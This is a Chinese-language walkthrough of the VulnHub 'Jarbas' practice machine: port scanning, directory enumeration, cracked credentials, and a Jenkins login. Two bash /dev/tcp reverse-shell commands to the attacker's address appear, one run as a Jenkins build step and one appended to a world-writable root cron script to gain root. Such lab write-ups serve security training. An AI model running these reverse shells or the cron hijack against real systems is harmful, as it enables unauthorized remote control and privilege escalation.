Jarbas
https://www.vulnhub.com/entry/jarbas-1,232/
主机发现
# yunki @ yunki in ~/vulnhub/w1r3s [18:30:39]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.11
Host is up (0.0024s latency).
nmap扫描
# yunki @ yunki in ~/vulnhub/w1r3s [18:30:43]
$ sudo nmap --min-rate 10000 -p- 192.168.54.11
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
# yunki @ yunki in ~/vulnhub/w1r3s [18:30:57]
$ sudo nmap -sT -sV -O -p22,80,3306,8080 192.168.54.11
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:99:B3:CF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
# yunki @ yunki in ~/vulnhub/w1r3s [18:31:57]
$ sudo nmap -sU -p22,80,3306,8080 192.168.54.11
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
3306/udp closed mysql
8080/udp closed http-alt
# yunki @ yunki in ~/vulnhub/w1r3s [18:32:42]
$ sudo nmap --script=vuln -p22,80,3306,8080 192.168.54.11
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open mysql
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:99:B3:CF (VMware)
web渗透
目录扫描
# yunki @ yunki in ~/vulnhub/w1r3s [19:15:49]
$ gobuster dir --url http://192.168.54.11/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.11/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/03/17 19:15:54 Starting gobuster in directory enumeration mode
===============================================================
什么也没扫到,添加一下扩展名再试试。
# yunki @ yunki in ~/vulnhub/w1r3s [19:17:09]
$ gobuster dir --url http://192.168.54.11/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.11/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php
[+] Timeout: 10s
===============================================================
2023/03/17 19:17:54 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 32808]
/.html (Status: 403) [Size: 207]
/access.html (Status: 200) [Size: 359]
/.html (Status: 403) [Size: 207]
打开access.html看看,发现hash,去破解。得到三个凭据。
tiago:italia99
trindade:marianna
eder:vipsu
尝试去登录8080端口的后台,试了个遍,只有第三个可以登录,登录成功。
是个cms,开始阅读。发现个可以上传shell的地方,新建任务,选择第一个,点击确定。
找到构建,选择execute shell,输入bash -i >& /dev/tcp/192.168.54.128/443 0>&1
,点击保存,,然后kali上开启监听,然后点击网页上的立即构建。
获得初始权限
# yunki @ yunki in ~/vulnhub/jarbas [19:20:29] C:255
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.11] 41582
bash: no job control in this shell
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ uname -r
uname -r
3.10.0-693.21.1.el7.x86_64
bash-4.2$
提权
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
通过定时任务提权
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
该定时任务,每五分钟用root权限执行
bash-4.2$ ls -liah /etc/script/CleaningScript.sh
ls -liah /etc/script/CleaningScript.sh
844412 -rwxrwxrwx. 1 root root 50 Apr 1 2018 /etc/script/CleaningScript.sh
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
往里加入点内容。
bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.54.128/444 0>&1" >> /etc/script/CleaningScript.sh
/CleaningScript.sh >& /dev/tcp/192.168.54.128/444 0>&1" >> /etc/script
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/192.168.54.128/444 0>&1
同时kali开启444端口监听,等待0~5mins,成功反弹shell!
# yunki @ yunki in ~/vulnhub/jarbas [19:48:08]
$ sudo nc -lvnp 444
[sudo] yunki 的密码:
listening on [any] 444 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.11] 33618
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[root@jarbas ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:99:b3:cf brd ff:ff:ff:ff:ff:ff
inet 192.168.54.11/24 brd 192.168.54.255 scope global dynamic ens33
valid_lft 1246sec preferred_lft 1246sec
inet6 fe80::9114:a460:aa3:9dd5/64 scope link
valid_lft forever preferred_lft forever
[root@jarbas ~]#